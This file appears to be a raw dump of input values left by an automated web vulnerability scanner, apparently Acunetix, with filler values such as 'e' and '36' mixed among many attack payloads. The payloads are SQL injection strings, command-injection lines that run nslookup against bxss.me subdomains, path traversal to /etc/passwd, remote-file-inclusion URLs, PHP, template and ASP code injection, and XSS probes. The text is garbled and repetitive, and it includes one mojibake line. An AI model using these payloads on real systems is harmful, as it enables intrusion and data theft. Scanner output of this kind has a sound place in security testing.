1h8Yn6RiO
e
e
e
e
e
e
e
e
36
e
36
æÖÍÇÁ ÝåÏ ÛÇäã ÇáÍÑÈí
e
1CbQQErgO
e
e
e
e
e
e
e
e
1RvXMBy6O
e
e
e
e
1x8DIfonO
e
e
e
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(72),CHAR(115),CHAR(76),CHAR(70),CHAR(85),CHAR(81),CHAR(81),CHAR(113)) from information_schema.tables limit 0,1)
36
(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(72),CHAR(115),CHAR(76),CHAR(70),CHAR(85),CHAR(81),CHAR(81),CHAR(113)),floor(rand()*2))x from (select 1 union sele
36
(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(72)+CHAR(115)+CHAR(76)+CHAR(70)+CHAR(85)+CHAR(81)+CHAR(81)+CHAR(113)) FROM syscolumns)
36
convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(72)+CHAR(115)+CHAR(76)+CHAR(70)+CHAR(85)+CHAR(81)+CHAR(81)+CHAR(113))
36
0
36
"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(83),CHAR(106),CHAR(48),CHAR(115),CHAR(100),CHAR(65),CHAR(120)) from information_schema.tables limit
36
"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(83),CHAR(106),CHAR(48),CHAR(115),CHAR(100),CHAR(65),CHAR(120)),floor(rand()*2))x from (select 1 union
36
"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(105)+CHAR(83)+CHAR(106)+CHAR(48)+CHAR(115)+CHAR(100)+CHAR(65)+CHAR(120)) FROM syscolumns)+"
36
"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(105)+CHAR(83)+CHAR(106)+CHAR(48)+CHAR(115)+CHAR(100)+CHAR(65)+CHAR(120))+"
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(121),CHAR(70),CHAR(121),CHAR(120),CHAR(100),CHAR(86),CHAR(65),CHAR(120)) from information_schema.tables limit 0
e
(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(121),CHAR(70),CHAR(121),CHAR(120),CHAR(100),CHAR(86),CHAR(65),CHAR(120)),floor(rand()*2))x from (select 1 union s
e
(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(121)+CHAR(70)+CHAR(121)+CHAR(120)+CHAR(100)+CHAR(86)+CHAR(65)+CHAR(120)) FROM syscolumns)
e
convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(121)+CHAR(70)+CHAR(121)+CHAR(120)+CHAR(100)+CHAR(86)+CHAR(65)+CHAR(120))
e
0
e
"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(54),CHAR(85),CHAR(83),CHAR(108),CHAR(117),CHAR(71),CHAR(74),CHAR(74)) from information_schema.tables limit 0,1
e
"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(54),CHAR(85),CHAR(83),CHAR(108),CHAR(117),CHAR(71),CHAR(74),CHAR(74)),floor(rand()*2))x from (select 1 union sel
e
"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(54)+CHAR(85)+CHAR(83)+CHAR(108)+CHAR(117)+CHAR(71)+CHAR(74)+CHAR(74)) FROM syscolumns)+"
e
"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(54)+CHAR(85)+CHAR(83)+CHAR(108)+CHAR(117)+CHAR(71)+CHAR(74)+CHAR(74))+"
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
)
36
!(()&&!|*|*|
36
^(#$!@#$)(()))******
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
)
e
!(()&&!|*|*|
e
^(#$!@#$)(()))******
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
set|set&set
36
nslookup hitPURuskLOSEb8e02.bxss.me
36
$(nslookup hitqTo9VTOy1T2838a.bxss.me)
36
|nslookup hitGHgGwxDg6Gf411a.bxss.me
36
`nslookup hitjXkdUXqj7W696bf.bxss.me`
36
;nslookup hit7eMcEv6iFh066cb.bxss.me|nslookup hit7eMcEv6iFh066cb.bxss.me&nslookup hit7eMcEv6iFh066cb.bxss.me;
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
set|set&set
e
nslookup hitt4xTnca9Jh7061b.bxss.me
e
$(nslookup hitVyefmzgz0m242d9.bxss.me)
e
|nslookup hitSIKCs4rMxD85ded.bxss.me
e
`nslookup hitGrDr2OqUEwf8eb0.bxss.me`
e
;nslookup hitHRowrKGPZ1e5639.bxss.me|nslookup hitHRowrKGPZ1e5639.bxss.me&nslookup hitHRowrKGPZ1e5639.bxss.me;
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
../../../../../../../../../../etc/passwd
36
e
36
../e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
../../../../../../../../../../etc/passwd
e
36
e
../36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
36
1some_inexistent_file_with_long_name .jpg
36
Http://bxss.me/t/fit.txt
36
http://bxss.me/t/fit.txt?.jpg
36
bxss.me
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
e
1some_inexistent_file_with_long_name .jpg
e
Http://bxss.me/t/fit.txt
e
http://bxss.me/t/fit.txt?.jpg
e
bxss.me
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
;print(md5(31337));
36
";print(md5(31337));$a="
36
${@print(md5(31337))}
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
;print(md5(31337));
e
";print(md5(31337));$a="
e
${@print(md5(31337))}
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
HttP://bxss.me/t/xss.html?%00
36
bxss.me/t/xss.html?%00
36
e
36
e
36
e
36
e
36
e
36
e
36
e
HttP://bxss.me/t/xss.html?%00
e
bxss.me/t/xss.html?%00
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
${9999875+9999323}
36
e
36
e
36
e
36
e
${9999397+9999707}
e
36
e
36
e
36
e
36
e
36
e
36
1r8vvRppO
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
1MboYcFnO
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
ajax.php
36
ajax.php
36
ajax.php/.
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
ajax.php
e
ajax.php
e
ajax.php/.
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
http://hitnnHrg1PKuH.bxss.me/
36
e
36
e
36
e
36
e
http://hitJAKxko2AHB.bxss.me/
e
36
e
36
e
36
e9646553
36
36
36
36
{{49938*49726}}
36
e
36
e
369680838
e
e
e
e
{{50121*50340}}
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(113),CHAR(67),CHAR(82),CHAR(68),CHAR(100),CHAR(51),CHAR(120),CHAR(116)) from information_schema.tables limit 0,
36
(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(113),CHAR(67),CHAR(82),CHAR(68),CHAR(100),CHAR(51),CHAR(120),CHAR(116)),floor(rand()*2))x from (select 1 union se
36
(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(113)+CHAR(67)+CHAR(82)+CHAR(68)+CHAR(100)+CHAR(51)+CHAR(120)+CHAR(116)) FROM syscolumns)
36
convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(113)+CHAR(67)+CHAR(82)+CHAR(68)+CHAR(100)+CHAR(51)+CHAR(120)+CHAR(116))
36
0
36
"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(81),CHAR(111),CHAR(117),CHAR(112),CHAR(83),CHAR(68),CHAR(119),CHAR(98)) from information_schema.tables limit 0
36
"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(81),CHAR(111),CHAR(117),CHAR(112),CHAR(83),CHAR(68),CHAR(119),CHAR(98)),floor(rand()*2))x from (select 1 union s
36
"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(81)+CHAR(111)+CHAR(117)+CHAR(112)+CHAR(83)+CHAR(68)+CHAR(119)+CHAR(98)) FROM syscolumns)+"
36
"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(81)+CHAR(111)+CHAR(117)+CHAR(112)+CHAR(83)+CHAR(68)+CHAR(119)+CHAR(98))+"
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(103),CHAR(114),CHAR(49),CHAR(119),CHAR(97),CHAR(89),CHAR(52)) from information_schema.tables limit 0,
e
(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(103),CHAR(114),CHAR(49),CHAR(119),CHAR(97),CHAR(89),CHAR(52)),floor(rand()*2))x from (select 1 union se
e
(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(105)+CHAR(103)+CHAR(114)+CHAR(49)+CHAR(119)+CHAR(97)+CHAR(89)+CHAR(52)) FROM syscolumns)
e
convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(105)+CHAR(103)+CHAR(114)+CHAR(49)+CHAR(119)+CHAR(97)+CHAR(89)+CHAR(52))
e
0
e
"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(81),CHAR(76),CHAR(101),CHAR(69),CHAR(89),CHAR(104),CHAR(110),CHAR(84)) from information_schema.tables limit 0,
e
"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(81),CHAR(76),CHAR(101),CHAR(69),CHAR(89),CHAR(104),CHAR(110),CHAR(84)),floor(rand()*2))x from (select 1 union se
e
"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(81)+CHAR(76)+CHAR(101)+CHAR(69)+CHAR(89)+CHAR(104)+CHAR(110)+CHAR(84)) FROM syscolumns)+"
e
"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(81)+CHAR(76)+CHAR(101)+CHAR(69)+CHAR(89)+CHAR(104)+CHAR(110)+CHAR(84))+"
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
)
36
!(()&&!|*|*|
36
^(#$!@#$)(()))******
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
)
e
!(()&&!|*|*|
e
^(#$!@#$)(()))******
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
set|set&set
36
nslookup hit3JPOFy1Tep33de7.bxss.me
36
$(nslookup hitHOwKJVKCw018019.bxss.me)
36
|nslookup hitfIZ47nUzTlc438d.bxss.me
36
`nslookup hitIoALyVyYoT4ccb6.bxss.me`
36
;nslookup hitVm86EFCCxse516b.bxss.me|nslookup hitVm86EFCCxse516b.bxss.me&nslookup hitVm86EFCCxse516b.bxss.me;
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
set|set&set
e
nslookup hitfGUcPfMdY14a027.bxss.me
e
$(nslookup hitKwm7WcmHl7d0524.bxss.me)
e
|nslookup hitZa77iWbWid0b92b.bxss.me
e
`nslookup hitOSWacZrMMv241cb.bxss.me`
e
;nslookup hithFhhrGViCJ51551.bxss.me|nslookup hithFhhrGViCJ51551.bxss.me&nslookup hithFhhrGViCJ51551.bxss.me;
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
../../../../../../../../../../etc/passwd
36
e
36
../e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
../../../../../../../../../../etc/passwd
e
36
e
../36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
36
1some_inexistent_file_with_long_name .jpg
36
Http://bxss.me/t/fit.txt
36
http://bxss.me/t/fit.txt?.jpg
36
bxss.me
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
e
1some_inexistent_file_with_long_name .jpg
e
Http://bxss.me/t/fit.txt
e
http://bxss.me/t/fit.txt?.jpg
e
bxss.me
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
;print(md5(31337));
36
";print(md5(31337));$a="
36
${@print(md5(31337))}
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
;print(md5(31337));
e
";print(md5(31337));$a="
e
${@print(md5(31337))}
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
HttP://bxss.me/t/xss.html?%00
36
bxss.me/t/xss.html?%00
36
e
36
e
36
e
36
e
36
e
36
e
36
e
HttP://bxss.me/t/xss.html?%00
e
bxss.me/t/xss.html?%00
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
${10000452+9999609}
36
e
36
e
36
e
36
e
${9999243+9999151}
e
36
e
36
e
36
e
36
e
36
e
36
1xb0lvb6O
36
e
36
e
36
e
36
e
36
e
36
e
36
e
1Q4sM524O
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
ajax.php
36
ajax.php
36
ajax.php/.
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
ajax.php
e
ajax.php
e
ajax.php/.
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
http://hitHeA5wwJv2A.bxss.me/
36
e
36
e
36
e
36
e
http://hitaJ2KJHNXAT.bxss.me/
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
response.write(9221074*9987401)
36
e
36
e
36
INuUeMm1
36
e
36
e
36
"+response.write(9221074*9987401)+"
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
jVP2TD6o
e
36
e
36
e
36
set|set&set
36
e
36
e
36
$(nslookup Tyr8skb7)
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
response.write(9789193*9954727)
${9999277+10000440}
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
"+response.write(9789193*9954727)+"
e
36
e
36
e
36
e
36
e
36
e
36
e
36
36
e
36
e
set|set&set
e
36
e
$(nslookup fJFvZP29)
e
36
e
36
e
36
e
36
e
36
e
36
36
e
36
e
${9999735+10000205}
e
36
e
36
e&n998272=v923597
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36&n933077=v997379
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
36
e
36
e
36
e
36
1some_inexistent_file_with_long_name .jpg
36
e
36
e
e
36
e
36
e
36
e
36
e
36
Http://testasp.vulnweb.com/t/fit.txt
36
e
e
36
e
36
e
36
e
36
e
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
http://testasp.vulnweb.com/t/fit.txt?.jpg
36
36
e
36
e
36
e
36
http://testasp.vulnweb.com/t/xss.html?%00.jpg
36
e
36
e
36
testasp.vulnweb.com
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
)
36
e
36
e
36
e
36
e
36
e
36
!(()&&!|*|*|
36
e
36
e
36
e
36
e
36
e
36
^(#$!@#$)(()))******
36
e
36
e
http://testasp.vulnweb.com/t/xss.html?%00.jpg
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
ajax.php
36
e
36
e
36
e
36
e
36
ajax.php
36
e
36
e
36
e
36
e
36
e
36
e
36
ajax.php/.
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
)
;print(md5(acunetix_wvs_security_test));
36
e
36
http://hitAOZVKWcNLO.bxss.me/
36
e
36
e
36
e
!(()&&!|*|*|
e
36
e
36
e
36
";print(md5(acunetix_wvs_security_test));$a="
36
e
36
e
36
e
36
e
36
${@print(md5(acunetix_wvs_security_test))}
36
e
36
e
36
e
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
e
36
e
^(#$!@#$)(()))******
e
36
e
36
e
36
e
36
e
1some_inexistent_file_with_long_name .jpg
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
Http://testasp.vulnweb.com/t/fit.txt
e
36
e
36
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
http://testasp.vulnweb.com/t/fit.txt?.jpg
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
testasp.vulnweb.com
e
36
e
ajax.php
e
36
e
http://hitDY8eh9dYdb.bxss.me/
e
36
e
36
e
36
e
36
e
36
e
ajax.php
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
ajax.php/.
e
36
e
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
/www.vulnweb.com
36
e
36
e
36
e
36
e
36
SMHiUmOn
36
e
36
e
36
e
36
e
36
e
36
e
36
e
36
-1 OR 2+437-437-1=0+0+0+1 --
36
e
36
e
36
e
36
e
36
-1 OR 2+862-862-1=0+0+0+1
36